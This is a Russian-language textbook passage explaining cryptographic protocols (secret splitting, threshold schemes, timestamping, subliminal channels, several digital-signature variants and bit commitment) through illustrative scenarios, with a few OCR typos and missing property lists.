Предположим, что вы собираетесь в отпуск. Ваш шеф попросил, чтобы вы сообщили пароль со своего компьютера кому-либо из коллег. Однако вы не можете полностью переложить ответственность за сохранность своих ценных данных ни на одного из товарищей по работе. В этой ситуации вам следует подумать о распределении ответственности.
Существует возможность разделить секретное сообщение на части, каждая из которых не имеет никакого смысла, но если их определенным образом соединить вместе, снова получится исходное сообщение. Таким образом вы сможете поделить свой пароль на части и, уходя в отпуск, оставить каждому из коллег по одной его части, чтобы, только собравшись все вместе, они оказались в состоянии запустить ваш компьютер. Сделать это в одиночку из них не сможет никто.
Простейший криптографический протокол позволяет Дмитрию поровну распределить между Антоном и Борисом ответственность за сохранение сообщения в тайне:
1. Дмитрий генерирует случайную битовую строку R, которая имеет ту же длину, что и исходное сообщение М.
2. Дмитрий складывает М с R по модулю 2 и получает S.
3. Дмитрий вручает R Антону, a S — Борису.
Чтобы восстановить сообщение М в исходном виде, Антон и Борис должны совместно выполнить последний шаг протокола:
1. Антон и Борис складывают R и S по модулю 2 и получают М.
В умелых руках данный протокол является весьма надежным. Знание S или R не позволяет реконструировать М. Дмитрий шифрует сообщение при помощи одноразового блокнота и отдает полученный в результате шифртекст одному человеку, а сам блокнот — другому.
Этот протокол можно легко применять для любого числа участников. Если участников 4, он будет выглядеть следующим образом:
1. Дмитрий генерирует три случайных битовых строки R, S и Т, которые имеют ту же длину, что и исходное сообщение М.
2. Дмитрий складывает М, R, S и Т по модулю 2 и получает U.
3. Дмитрий вручает R Антону, S — Борису, Т — Владимиру, U — Георгию.
Чтобы восстановить сообщение М в исходном виде, Антон, Борис, Владимир и Георгий должны совместно выполнить последний шаг протокола:
1. Антон, Борис, Владимир и Георгий складывают R, S, Т и U по модулю 2 и получают М.
Одним из участников протокола является Дмитрий, который наделен неограниченными правами. Например, Дмитрий может зашифровать какую-нибудь абракадабру вместо М, а потом утверждать, что Антон и другие участники протокола являются хранителями настоящей тайны, а не какой-то чепухи. Чтобы разоблачить Дмитрия, им необходимо собраться вместе и восстановить исходное сообщение. А еще Дмитрий может сначала раздать части своего сообщения Антону, Борису, Владимиру и Георгию, а затем сложить М и U по модулю 2 и заявить, что только Антон, Борис и Владимир нужны для восстановления сообщения в исходном виде, а от Георгия можно избавиться. Поскольку сообщение М всецело принадлежит только Дмитрию, он может распоряжаться им, как того пожелает.
Основной недостаток криптографического протокола, распределяющего ответственность за сохранение сообщения в тайне, состоит в том, что если хотя бы один из его участников потеряет доверенную ему часть, будет также безвозвратно утрачено и само сообщение. Если, конечно, Дмитрий не помнит его наизусть. В результате в распоряжении участников протокола останется только длина исходного сообщения. Но вряд ли они захотят довольствоваться только этим.
Существуют ситуации, в которых необходимо уметь восстанавливать секретное сообщение даже в отсутствие некоторых участников протокола. Например, вы пишете программу для управления запуском межконтинентальных ракет. Естественно, вы хотите сделать так, чтобы если офицер, имеющий доступ к "ядерной кнопке", сойдет с ума и захочет уничтожить какой-либо континент, у него это ни в коем случае не получится. У "ядерной кнопки" должны собраться вместе по меньшей мере пятеро сумасшедших офицеров, чтобы с помощью вашей программы стереть в порошок Америку.
Ситуацию можно еще усложнить. Допустим, что для нажатия "ядерной кнопки" в нашей стране нужны 1 генерал и 3 полковника. А если генерал по причине своего старческого склероза, забыл приехать к "ядерной кнопке" в назначенное время, достаточно и пятерых полковников. При этом, если собрались всего 4 полковника, Америке ничего не грозит до тех пор, пока 5 полковников не окажутся в полном сборе. Или пока генерал не приедет.
Криптологи придумали так называемый пороговый протокол, который позволяет распределять ответственность даже еще более сложным образом. В общем случае берется любое секретное сообщение (пароль, код запуска баллистических ракет, рецепт приготовления "Кока-колы") и делится па n частей (называемых долями) так, что для реконструкции исходного сообщения обязательно нужны m из них. Такой протокол более точно именуется ( т, п ) - пороговым протоколом.
Например, при использовании (3,4)-порогового протокола Дмитрий может поделить между Антоном, Борисом, Владимиром и Георгием секретный пароль для включения своего персонального компьютера таким образом, что трое из них, собравшись вместе, будут в состоянии восстановить этот пароль и включить компьютер Дмитрия. Если Владимир неожиданно попадет в больницу в бессознательном состоянии, то же самое смогут сделать Антон, Борис и Георгий. Однако, если Борис в это время будет в командировке, без него Антон и Георгий так и не смогут запустить компьютер Дмитрия.
Существует множество способов мошенничества со стороны как участников порогового протокола, распределяющего между ними ответственность за хранение тайны, так и посторонних лиц. Для примера рассмотрим три сценария такого мошенничества:
1. Антон, Борис, Владимир и Георгий получают от шефа приказ включить персональный компьютер Дмитрия. Все четверо собираются вместе и выполняют операцию сложения имеющихся у них долей по модулю 2. Однако Георгий, которого подкупила конкурирующая фирма, вместо того чтобы честно прибавить свою долю, выданную ему Дмитрием, прибавляет случайную битовую строку. В результате компьютер Дмитрия отказывается включаться, и никто не может объяснить, в чем тут дело.
2. К Антону, Борису, Владимиру и Георгию, получившим от шефа распоряжение включить персональный компьютер Дмитрия, присоединяется Зиновий, который утверждает, что он явился по приказу шефа для воссоздания пароля, поскольку якобы является законным обладателем соответствующей пятой доли. После того как ничего не подозревающие Антон, Борис, Владимир и Георгий огласили свои доли, Зиновий с торжествующем воплем убегает из комнаты: теперь он может в одиночку реконструировать пароль Дмитрия, т. к. знает все необходимые для этого доли.
3. Вместо того чтобы убежать, Зиновий дожидается, пока все участники протокола по очереди огласят свои доли, а затем называет случайную битовую строку требуемой длины. В этом случае Зиновий не только сумеет узнать все доли, но и никто из участников протокола так и не осознает. что Зиновий является посторонним лицом и не имеет никакого права присутствовать при восстановлении секретного пароля Дмитрия.
Для предотвращения мошенничества можно соответствующим образом усовершенствовать пороговый протокол, однако подробное описание этих усовершенствований выходит за рамки данной книги. Поэтому просто перечислим некоторые из них.
Вспомогательные криптографические протоколы
Отметка о времени создания файла
Существует немало ситуаций, когда людям приходится доказывать, что некий документ уже существовал в определенный момент времени. Например, в споре об авторском праве на изобретение побеждает тот, кто предъявит самую раннюю копию описания сути этого изобретения. Если соответствующая документация оформляется на бумаге, заверенную нотариусом копию документа можно передать на хранение в нотариальную контору. При возникновении конфликта нотариус или другой полномочный представитель юридической конторы засвидетельствует существование документа в определенный момент времени.
В компьютерном мире все значительно сложнее. Файл, в котором хранится документ, может быть скопирован и изменен бессчетное число раз. А поменять отметку о времени последней модификации этого файла по силам даже начинающему пользователю. И никто не сможет просто взглянуть на файл и сказать: "Да, я абсолютно уверен, что данный файл был создан именно 15 марта 1996 г." Необходимо пользоваться специальным криптографическим протоколом, который обладает следующими свойствами:
Отметка о времени создания файла и арбитраж
Файл можно снабдить отметкой о времени его создания при помощи протокола, в котором принимает участие доверенное лицо (Дмитрий):
1. Антон передает копию своего документа Дмитрию.
2. Дмитрий фиксирует время получения копии документа, которую с этого момента хранит у себя, чтобы предъявить по первому требованию Антона.
Теперь при возникновении разногласий относительно времени создания документа Антон обращается к Дмитрию, который демонстрирует копию документа и дает свидетельские показания о том, когда этот документ был им получен.
Данный протокол позволяет добиться желаемой цели, однако имеет ряд существенных недостатков, связанных с тем, что Антон должен отдать копию своего документа на хранение Дмитрию.
О Любой, кто способен перехватывать информацию, передаваемую Антоном по каналам связи, сможет прочесть этот документ. Даже если Антон шифрует все свои сообщения, его документ скорее всего попадет в компьютерную базу данных Дмитрия. Антону остается только надеяться, что Дмитрий достаточно ответственно относится к защите переданных ему на хранение документов от посягательств посторонних лиц.
Чтобы избавиться если не от всех, то хотя бы от большинства перечисленных недостатков, можно прибегнуть к помощи однонаправленных функции:
1. Антон вычисляет хэш-значение для своего документа.
2. Антон передает вычисленное хэш-значение Дмитрию.
3. Дмитрий добавляет к этому хэш-значению отметку о времени его получения и ставит свою цифровую подпись под итоговым документом.
4. Дмитрий отсылает подписанное им хэш-значение с проставленной отметкой времени обратно Антону.
Теперь Антону нечего беспокоиться о том, достаточно ли надежно хранит Дмитрий доверенные ему документы. Дмитрию вообще не надо ничего держать в своей базе данных, и, следовательно, сами собой отпадают проблемы. связанные с хранением огромных объемов информации. Антон может сразу проверить полученный от Дмитрия итоговый документ на предмет наличия в нем искажений, внесенных при передаче по каналам связи. Однако по-прежнему нерешенной остается проблема сговора между Антоном и Дмитрием с целью снабдить документ нужной отметкой о времени его создания.
Связующий протокол
Вряд ли Антон является единственным клиентом Дмитрия. Скорее всего. Дмитрий уже ставил отметки о времени создания на документы других людей, прежде чем с аналогичной просьбой к нему обратился Антон. А это значит, что отметке о времени создания документа Антона предшествует какая-то отметка, внесенная в документ другого человека. Более того, разумно предположить, что в скором времени к Дмитрию поступят и другие документы, которые потребуется снабдить отметкой о времени создания.
Пусть А— это идентификатор Антона, присвоенный ему в компьютерной сети, Н n — хэш-значение документа, для которого Антон хочет получить отметку о времени создания, a T n -1 — отметка о времени создания предыдущего документа. Тогда, чтобы затруднить сговор между Антоном и Дмитрием, можно воспользоваться так называемым связующим протоколом:
1. Антон посылает Дмитрию Н n и А.
2. Дмитрий отсылает обратно Антону T n = S K (n,A,H n ,T n ,I n -1 ,H n-1 ,T n-1 ,L n ), где L n представляет собой следующую связующую информацию, подвергнутую хэшированию при помощи функции Н вида L n = H(I n -1 ,H n-1 ,T n-1 ,L n -1 ). Здесь наличие S К свидетельствует о том, что сообщение подписано цифровой подписью Дмитрия. Присутствие А необходимо, чтобы идентифицировать Антона в качестве получателя этого сообщения. Параметр n задает порядковый номер отметки о времени создания документа, хэш-значение которого Дмитрий получил от Антона. Т n — это сама отметка о времени. Остальные параметры перечисляют идентификатор хэш-значение, отметку времени и связующую информацию, которые были вычислены для предыдущего документа, присланного Дмитрию для постановки отметки о времени создания.
3. После того как Дмитрий получит следующий документ, на который потребуется поставить отметку о времени создания, он перешлет Антону идентификатор I n+ 1 своего очередного клиента, приславшего этот документ.
Теперь, если кто-то поставит под сомнение время создания документа Антоном, он может связаться с I n -1 и I n +1 , т. е. с авторами предыдущего и следующего документов, присланных Дмитрию. Если и у них возникнут сомнения относительно времени создания документов, то они. в свою очередь, могут обратиться к I n - 2 и I n + 2 . Каждый из них может доказать, что на его документ была поставлена отметка времени, предшествующая отметке следующего клиента и идущая за отметкой предыдущего.
Связующий протокол значительно осложняет сговор между Антоном и Дмитрием. Дмитрий не сможет перенести отметку о времени создания документа в будущее, поскольку тогда от него потребуется умение это будущее предсказывать — он должен точно знать, какой именно документ будет прислан непосредственно перед этим моментом времени. Точно так же Дмитрий будет не в состоянии сделать отметку о времени создания документа более ранней, чем это есть на самом деле: она должна быть встроена во временную отметку следующего документа, а на этот документ соответствующая отметка уже поставлена. У Антона и Дмитрия остается единственная возможность смошенничать: они могут породить цепочку фиктивных документов до и после документа Антона, причем эта цепочка должна быть настолько длинной, чтобы у проверяющего не хватило терпения изучить ее до самого конца.
Распределенный протокол
Люди не вечны. Поэтому вполне может случиться так, что когда Антон обратится за содействием к I n -1 , тот уже успеет отправиться в мир иной, где отметки о времени создания документов вовсе не так важны для его обитателей. В этом случае можно посоветовать Антону воспользоваться распределенным протоколом и встроить в отметку о времени создания своего документа временные отметки, по крайней мере, 10-и других человек. Таким образом, у Антона будет больше шансов найти людей, которые при необходимости смогут помочь удостоверить время создания его документа. Распределенный протокол также позволяет избавиться от услуг Дмитрия:
1. С помощью генератора криптографически надежной псевдослучайной последовательности Антон получает k чисел R 1 , R 2 , . . . , R k , в качестве начального значения используя хэш-значение Н n , вычисленное для своего документа,.
2. Антон интерпретирует сгенерированные числа R 1 , R 2 , . . . , R k , как идентификаторы абонентов компьютерной сети, и отсылает Нп каждому из них.
3. Все выбранные Антоном абоненты сети добавляют к хэш-значению Н n отметку о времени его получения, подписывают итоговое сообщение своей цифровой подписью и отсылают обратно Антону.
4. Антон собирает и хранит все k подписей вместе с отметкой о времени создания своего документа.
Криптографически надежный генератор псевдослучайных чисел необходим для того, чтобы Антон не смог повлиять на выбор идентификаторов и, тем самым, подобрать людей, с которыми он в состоянии вступить в сговор. Даже если Антон попытается соответствующим образом изменить свои документ, чтобы получить по нему такое хэш-значение, которое позволило бы сгенерировать необходимый Антону набор идентификаторов, его шансы преуспеть в этом занятии будут ничтожны.
Антон может смошенничать, только убедив всех без исключения k участников протокола вступить с ним в сговор. Поскольку эти участники выбираются наугад, вряд ли у Антона что-нибудь получится, Однако чем более коррумпированным является общество, тем больше должно быть значение k.
Дополнительно придется позаботиться о том, как поступать с людьми, которые вовремя не отреагируют на просьбу Антона подписать высланное им хэш-значение. Вероятнее всего, для официального признания правильности отметки о времени создания документа от Антона потребуется собрать не , менее К подписей, где значение К фиксируется в законодательном порядке.
Подсознательный канал
Предположим, что Антон и Борис были арестованы и препровождены в тюрьму. Их тюремный охранник Олег не возражает против того, чтобы они обменивались сообщениями, но при одном условии: эти сообщения не должны быть зашифрованы. Вдруг Антон и Борис захотят разработать план совместного побега! Поэтому Олег желает читать все, что Антон и Борис сообщают друг другу.
А еще Олег надеется обмануть Антона, договорившись с Борисом, и в удобный момент подменить настоящее сообщение от одного из них другому на фальшивое. Антону и Борису ничего не остается, как воспользоваться услугами Олега. Ведь иначе они не смогут общаться друг с другом и координировать свои планы. Поэтому Антону и Борису придется организовать между собой так называемый подсознательный канал. Пользуясь этим каналом, они смогут передавать секретную информацию, а Олег, который будет читать псе их сообщения, так ничего и не заподозрит.
Простым подсознательным каналом может служить число слов в предложениях невинного на первый взгляд текста. Нечетное количество слов соответствует 0, а четное — 1. Таким образом, если мой сообщник подсчитает количество слов в предложениях предыдущего абзаца, то получит секретное сообщение "11010". К сожалению, в этом алгоритме отсутствует ключ, а сам алгоритм является ограниченным — здесь стойкость всецело зависит от сохранения в тайне самого алгоритма.
Американский криптолог Г. Симмонс (G. Simmons) первым сумел встроить подсознательный канал в обыкновенную цифровую подпись. В этом случае алгоритм цифровой подписи со встроенным подсознательным каналом б\-дет неотличим для Олега от стандартного алгоритма цифровой подписи. Олег не только не сможет читать сообщения, передаваемые Антоном и Борисом по подсознательному каналу. В его мозгу не мелькнет даже намека па мысль о возможном существовании такового.
Протокол, придуманный Симмонсом для реализации подсознательного канала с помощью цифровой подписи, в общих чертах выглядит так:
1. Антон генерирует произвольное сообщение, выглядящее вполне невинно.
2. При помощи секретного ключа, который имеется и у Бориса, Антон подписывает свое сообщение так, что в подписи прячется подсознательный канал.
3. Антон отдает подписанное сообщение Олегу.
4. Олег знакомится с сообщением Антона, проверяет цифровую подпись. Не обнаружив ничего подозрительного, Олег передает это сообщение Борису.
5. Борис проверяет цифровую подпись Антона под полученным из рук Олега сообщением и убеждается, что оно пришло от Антона.
6. Используя секретный ключ, которым он владеет совместно с Антоном, Борис извлекает секретную информацию, содержащуюся в подсознательном канале.
Что касается надежд Олега подсунуть одному из "друзей по переписке", томящихся в тюрьме, фальшивое сообщение, якобы исходящее от другого, то им не суждено сбыться. Дело в том, что Олег не сможет сгенерировать подлинную цифровую подпись Антона и, следовательно, не в состоянии послать фальшивую информацию по подсознательному каналу. А поскольку у Олега нет секретного ключа, совместно используемого Антоном и Борисом, то он не сможет прочесть ни одного сообщения, которыми они обмениваются. Сообщения, под которыми стоит обыкновенная цифровая подпись, для Олега ничем не отличаются от сообщений с цифровой подписью со встроенным в нее подсознательным каналом.
К сожалению, в некоторых алгоритмах подсознательный канал устроен таким образом, что секретная информация, необходимая Борису, чтобы читать сообщения Антона, совпадает с секретной информацией, имеющейся у Антона и позволяющей ему посылать невинно выглядящие сообщения Борису. В этом случае ничто не может помешать Борису перевоплотиться в Антона и посылать фальшивые сообщения, якобы исходящие от его имени. Однако имеется ряд других алгоритмов, свободных от этого недостатка. В них секретный ключ, находящийся в распоряжении Антона, отличается от ключа, которым пользуется Борис, и, следовательно, Антону не приходится опасаться злоупотреблений со стороны Бориса.
Практическое применение подсознательного канала
На практике подсознательный канал наиболее подходит для организации связи в шпионских сетях. Если в стране, куда заслан шпион, почти все ее граждане регулярно посылают и получают электронные сообщения, снабженные цифровой подписью, то, совершенно не рискуя попасть под подозрение, он может подписывать свои невинно выглядящие сообщения с помощью цифровой подписи, в которую встроен подсознательный канал для передачи шпионских посланий.
Другие области практического применения подсознательного канала менее очевидны. Используя подсознательный канал, Антон может подписан, документ под угрозой физической расправы, вставив в него секретное сообщение вида "Меня заставили поставить эту подпись", чтобы иметь возможность впоследствии ее оспорить. Правоохранительные органы мот наносить специальную маркировку на электронную наличность, чтобы отслеживать ее движение. Офисная программа, с помощью которой ставится электронная подпись под документами компании, может иметь двойное назначение и дополнительно использоваться для передачи коммерческих секретов конкурентам.
Подобных возможностей — масса, и поэтому, чтобы воспрепятствовать злонамеренному использованию цифровой подписи для организации подсознательного канала связи, были разработаны специальные алгоритмы, которые не могут быть модифицированы с целью встраивания в них подсознательного канала.
Довольно легко получить точную копию обычной цифровой подписи. Иногда это приходится очень кстати, особенно если цифровая подпись стоит под объявлением, предназначенным для всеобщего ознакомления. Однако свободно циркулирующее личное или деловое письмо, в подлинности которого в состоянии убедиться всякий, может поставить его автора в довольно неловкое положение, не говоря уже об опасности прямого шантажа. Поэтому лучше применять такую цифровую подпись, которую можно проверить, но нельзя продемонстрировать посторонним лицам без согласия ее владельца.
Предположим, что Антон возглавляет компанию "ПрограммКомп", которая торгует универсальным текстовым редактором "УниЛекс'97" собственного изготовления. Чтобы исключить заражение компьютерным вирусом машин. принадлежащих покупателям этого программного продукта, "ПрограммКомп" снабжает каждую копию "УниЛекса'97" цифровой подписью. Однако необходимо, чтобы только легальные покупатели "УниЛекса'97" могли проверить подлинность цифровой подписи. Если в купленной на законных основаниях копии "УниЛекса'97" вдруг обнаружится вирус, "ПрограммКомп" не сможет оспорить подлинность своей цифровой подписи.
Для этого "ПрограммКомп" должна воспользоваться неоспоримой цифровой подписью. Подобно обыкновенной цифровой подписи, неоспоримая подпись определяется содержанием подписанного документа и зависит от тайного ключа ее автора. Основное отличие неоспоримой цифровой подписи ел обыкновенной состоит в том, что неоспоримую подпись нельзя проверить без согласия поставившего ее человека. С этой точки зрения ее лучше было бы назвать "подписью без права передачи". Тем не менее, свое название неоспоримая цифровая подпись получила благодаря другому своему свойству: если Антон будет вынужден либо признать подлинность предъявленной ему неоспоримой цифровой подписи, либо отвергнуть ее, то он не сможет отказаться от нее в случае, если эта подпись является настоящей.
Математический аппарат, используемый для конструирования неоспоримой цифровой подписи, довольно сложен и громоздок, однако основная идея соответствующего протокола достаточно прозрачна:
1. Антон знакомит Бориса со своей цифровой подписью.
2. Борис генерирует случайное число и передает его в распоряжение Антона.
3. На основе полученного от Бориса случайного числа и собственного тайного ключа Антон выполняет специальные вычисления, результат которых отсылает обратно Борису. Антон может сделать это только в том случае, если цифровая подпись является подлинной.
4. Борис подтверждает получение вычисленного Антоном значения.
С помощью дополнительных математических ухищрений можно добиться. чтобы Антон мог доказать, что он не подписывал документ, авторство подписи под которым необоснованно приписывается ему, и не смог "отвертеться", если подпись действительно принадлежит ему.
Один из недостатков протокола, позволяющего ставить неоспоримую цифровую подпись под документом, состоит в том, что Борис не в состоянии убедить третьего участника этого протокола (Владимира) в подлинности Цифровой подписи Антона. А все потому, что Владимир не имеет возможности удостовериться, насколько случайно число, сгенерированное Борисом на шаге 2. С таким же успехом Борис мог выполнить все шаги протокола в обратном порядке без участия Антона, а затем продемонстрировать Владимиру полученный результат. Владимиру необходимо принять участие во всех шагах протокола самому (вместо Бориса), чтобы проверить 100-процентную подлинность цифровой подписи Антона.
В результате Борис может на законных основаниях приобрести копию "УниЛекса'97", сделать с нее пиратскую копию и перепродать Владимиру. Как только Владимир захочет проверить подлинность цифровой подписи под пиратской копией "УниЛекса'97", Борис обратится к Антону с просьбой произвести проверку подписи под купленной легально копией этого текстового редактора. Сгенерированное Владимиром случайное число Борис переадресует Антону, а поступивший от Антона ответ он перешлет Владимиру.
Но даже с учетом присущих ей изъянов неоспоримая цифровая подпись может быть с успехом использована там, где Антону не требуется, чтобы кто-либо имел возможность проверять эту подпись бесконтрольно. Например, если Антон продал конфиденциальную информацию, заверенную с помощью неоспоримой цифровой подписи, то с его стороны вполне естественно потребовать, чтобы только покупатель этой информации мог проверить подлинность подписи Антона.
Если дела у компании "ПрограммКомп" резко пойдут в гору и "УниЛекс'97" станут покупать нарасхват, то Антону вскоре придется заниматься одной только проверкой подлинности цифровых подписей на проданных копиях вместо того, чтобы готовить к выпуску новую, более универсальную, версию своего текстового редактора. Поэтому Антон вряд ли откажется, если ему Борис предложит стать его конфирмантом, т. е. взять на себя верификацию подписей Антона. Для этого Антон просто будет ставить под копиями "УниЛекса'97" не обыкновенную цифровую подпись, а цифровую подпись с назначенным конфирмантом.
В результате Антон сможет переложить ответственность за проверку подлинности своей цифровой подписи целиком на Бориса, причем даже без его предварительного согласия, не дожидаясь, пока тот сам предложит свои услуги. Для этого Антону достаточно будет просто воспользоваться открытым ключом Бориса. В случае отсутствия Антона по причине командировки в другой город, приступа желчно-каменной болезни или даже безвременной кончины, Борис все равно будет в состоянии в любой момент времени проверить подлинность подписи Антона.
Цифровая подпись с назначенным конфирмантом позволяет найти разумный компромисс между обычной и неоспоримой подписями. С одной стороны, вполне понятно стремление Антона ограничить круг людей, которые могут проверить подлинность его цифровой подписи. С другой стороны, у Антона открываются слишком широкие возможности для злоупотреблений. Например, он может отказаться сотрудничать с кем бы то ни было, просто заявив, что потерял ключи, необходимые для проверки своей цифровой подписи. В этом случае заранее назначенный Антоном конфирмант (Борис) заменит Антона в его отсутствие и произведет все требуемые действия.
Цифровая подпись с назначенным конфирмантом может оказаться полезной не только для компании, торгующей программным обеспечением. Если Борис поместит свой открытый ключ в общедоступный справочник, то его услугами в качестве назначенного конфирманта сможет воспользоваться любой, кто в них нуждается. Взимая небольшую плату за проверку каждой цифровой подписи, Борис сможет обеспечить себе безбедную старость.
Кроме проверки своей цифровой подписи, Антон может поручить другому лицу ставить эту подпись вместо себя. В жизни случается всякое, и Антон не застрахован от несчастного случая. Или, например, попытка продать текстовый редактор "УниЛекс'97" якутским оленеводам может потребовать от Антона посещения районов, в которых компьютерные сети — все еще большая редкость. Каким же образом Антон может передать Борису право подписывать все документы вместо себя, не предоставляя ему доступ к своему тайному ключу?
Для этого Антону следует воспользоваться цифровой подписью по доверенности. Тогда в случае необходимости Антон сможет передать Борису доверенность на право ставить свою цифровую подпись. Для этого поставленная по доверенности цифровая подпись должна обеспечивать:
Подпись по доверенности всегда можно отличить от оригинальной подписи ее настоящего владельца.
В некоторых случаях требуется, чтобы возможность однозначно идентифицировать лицо, поставившее цифровую подпись по доверенности, была предоставлена не только законному владельцу подписи, но и любому, кто пожелает это сделать.
Групповыми подписями называются цифровые подписи, которые обладают следующими свойствами:
Поставить групповую подпись под документом можно, например. мощи следующего протокола с арбитражем:
1. Дмитрий генерирует большое количество пар ключей, состоящих из открытого и соответствующего ему тайного ключа. Каждый член группы получает от Дмитрия свой набор тайных ключей. При этом никакой тайный ключ из одного набора не повторяется в другом.
2. Дмитрий в случайном порядке помещает все открытые ключи в общедоступную базу данных, сохраняя в секрете от посторонних информацию о том, кому из членов группы принадлежит каждый из этих ключей.
3. Чтобы подписать документ, член группы выбирает ключ из списка, предоставленного ему Дмитрием.
4. Чтобы проверить подлинность групповой подписи, достаточно воспользоваться соответствующим открытым ключом, обратившись за ним в базу данных.
5. В случае возникновения спора Дмитрий знает, кому из членов группы принадлежит ключ, с помощью которого была поставлена подпись, вызвавшая разногласия.
Недостатком данного протокола является наличие арбитра, который знает все секретные ключи и может подделать любую подпись. Кроме того, сгенерированное Дмитрием множество пар ключей должно быть очень большим, чтобы воспрепятствовать попыткам выяснить, какой из ключей кому принадлежит.
Предположим, что в распоряжении злоумышленника Зиновия имеется множество высокопроизводительных компьютеров. И все они работают днем и ночью, чтобы вскрыть тайный ключ Антона, которым тот попытается, подписывая своей цифровой подписью важные финансовые документы. Цель оправдывает средства: ведь в случае успеха Зиновий сможет свободно распоряжаться весьма значительными денежными средствами Антона, подделывая его подпись.
Чтобы противостоять злодейским планам Зиновия, Антону следует воспользоваться цифровой подписью с дополнительной защитой. Тогда, если Зиновии вскроет тайный ключ Антона с помощью тотального перебора и подделает его подпись, Антон сможет разоблачить подделку. Идея, которая лежит в основе цифровой подписи с дополнительной зашитой, достаточно проста. Каждому открытому ключу ставится в соответствие не один тайный ключ, а некоторое множество тайных ключей. Любой из них позволяет поставить под документом цифровую подпись, но она будет отлична от подписей, изготовленных при помощи других ключей. Антон знает только один ключ, остальные ему неизвестны.
Теперь, если Зиновий накопит достаточно документов, подписанных Антоном, и попробует использовать всю мощь своих компьютеров для нахождения тайного ключа Антона, то самое большее, чего сможет добиться Зиновий, — это отыскание отдельного ключа. А если количество возможных тайных ключей, соответствующих данному открытому ключу, чрезвычайно велико, то Зиновий вряд ли найдет именно тот ключ, который использует Антон для подписи своих документов.
Если Зиновий попытается подделать подпись Антона, воспользовавшись тайным ключом, вскрытым тотальным перебором, то эта подделка будет заметно отличаться от настоящей подписи Антона. И когда дело дойдет до суда, Антон сможет продемонстрировать, что с помощью его собственного ключа получается совсем другая подпись, чем та, которую обманным путем воспроизвел Зиновий. Однако в случае, если Антон окажется не в состоянии доказать суду существование двух различных подписей, это будет означать, что подпись под спорным документом является подлинной.
Таким образом, цифровая подпись с дополнительной защитой позволяет отразить атаку, предпринятую Зиновием, имеющим в своем распоряжении самые современные суперкомпьютеры. Но с бандитом, который проникнет в квартиру Антона и украдет его тайный ключ, или с самим Антоном, подписавшим документ и потом сделавшим вид, что потерял ключ, ничего не сможет поделать даже самая изощренная схема цифровой подписи с дополнительной защитой. В первом случае остается только посоветовать установить более совершенную сигнализацию или обзавестись сторожевой собакой. А во втором — тщательнее выбирать себе деловых партнеров.
Непревзойденный маг и волшебник Антон решает публично продемонстрировать свои необычайные интеллектуальные способности. Он точно знает. какую карту выберет из колоды Борис еще до того, как это сделает сам Борис! Поэтому Антон записывает название этой карты на листке бумаги, кладет листок в конверт и запечатывает его. Затем Антон передает запечатанный конверт на хранение кому-то из публики. "Возьми из колоды любую карту", — предлагает Антон Борису. Борис выбирает наугад карту и показывает зрителям: "Туз пик". Антон вскрывает конверт и извлекает из него листок бумаги, на котором, как все могут убедиться, черным по белому написано: "Туз пик". Шквал аплодисментов.
Но как узнать наверняка, что Антон не подменил конверт, прежде чем его вскрыть? Специальный криптографический протокол позволяет Антону сохранить предсказанное им значение, состоящее из одного пли нескольких битов, в тайне до тех пор, пока он не пожелает ознакомить с ним остальных. С другой стороны, следуя данному протоколу, Борис сможет удостовериться, что Антон не смошенничал и не изменил свой выбор уже после того, как этот выбор был им сделан.
Информация о сделанном Антоном выборе фиксируется в виде обязательства, которое передается на хранение Борису. Обязательство представляет собой значение, которое, после того как Антон познакомит Бориса со своим выбором, Борис может предъявить Антону и потребовать, чтобы Антон преобразовал это значение и получил величину, известную Борису. Если Антон сумеет это сделать, значит мошенничества с его стороны проявлено не было.
Антон может сделать предсказание, выполнив шаги протокола, который использует симметричную криптосистему:
1. Борис, генерирует случайную битовую строку S и посылает ее Антону.
2. Антон присоединяет бит b , значение которого он собирается предсказать, к S, шифрует полученную в результате битовую строку (S,b) при помощи симметричной криптосистемы E K и некоторого секретного ключа К, а затем отсылает результат обратно Борису.
На этом завершается процесс предсказания. Поскольку Борис не может дешифровать полученное от Антона сообщение Е K ( S , b ), то предсказание, сделанное Антоном, остается для Бориса тайной за семью печатями.
Теперь, если Антон пожелает ознакомить Бориса со своим предсказанием, они могут продолжить совместное выполнение следующих шагов протокола:
1. Антон посылает Борису ключ К.
2. С помощью К Борис расшифровывает Е K ( S , b ) и узнает значение b . Чтобы убедиться в честности Антона, Борис проверяет, содержит ли открытый текст расшифрованного сообщения сгенерированную им случайную битовую строку S.
Если бы посланное Борису сообщение изначально не содержало случайной битовой строки, Антон мог бы впоследствии попытаться подобрать другой ключ, использование которого позволило бы ему получить вместо предсказанного значения b противоположное. Поскольку b принимает всего 2 возможных значения, сделать это будет очень просто. Однако при наличии в сообщении случайной битовой строки, сгенерированной Борисом, Антону придется подобрать ключ, который при расшифровании сообщения даст не только инвертированный бит b , но и S. Если Антон пользуется хорошей симметричной криптосистемой, то его шансы найти такой ключ будут пренебрежимо малы. Следовательно, Антон не сможет изменить предсказанное им значение после того, как сделает свой выбор, выполнив первые 2 шага протокола.
Предсказание бита с помощью однонаправленной функции
Антон может предсказать битовое значение, воспользовавшись свойствами. которыми обладают однонаправленные функции:
Антон генерирует две случайные битовые строки S 1 и S 2;
Антон присоединяет к сгенерированным S 1 и S 2 бит b , значение которою собирается предсказать;
Антон вычисляет значение однонаправленной функции Н, используя в качестве аргумента битовую строку (S 1 , S 2 ,b), и вместе с S 1 отсылает Борису полученный результат.
Теперь у Бориса имеется вся необходимая информация, которая не позволит Антону впоследствии изменить предсказанное значение b . Однако проверить правильность предсказания без участия Антона Борис не сможет. поскольку в этом случае ему придется вычислять H -1 (S 1 ,S 2 ,b).
Когда потребуется, чтобы Антон ознакомил со своим предсказанием Бориса, им обоим необходимо будет продолжить выполнение следующих шагов протокола:
1. Антон посылает Борису исходную битовую строку (S 1 ,S 2 ,b).
2. Борис вычисляет H(S 1 ,S 2 ,b), а затем сравнивает вычисленное значение и S 1 со значением и случайной битовой строкой, присланными ему Антоном на шаге 3. В случае совпадения b действительно представляет собой значение, предсказанное Антоном на шаге 2.
По сравнению с предсказанием бита при помощи симметричной криптосистемы, при предсказании бита с помощью однонаправленной функции не требуется, чтобы Борис посылал какие-либо сообщения Антону. А Антону необходимо отослать всего одно сообщение, чтобы сделать предсказание, и еще одно, чтобы Борис смог с этим предсказанием ознакомиться.
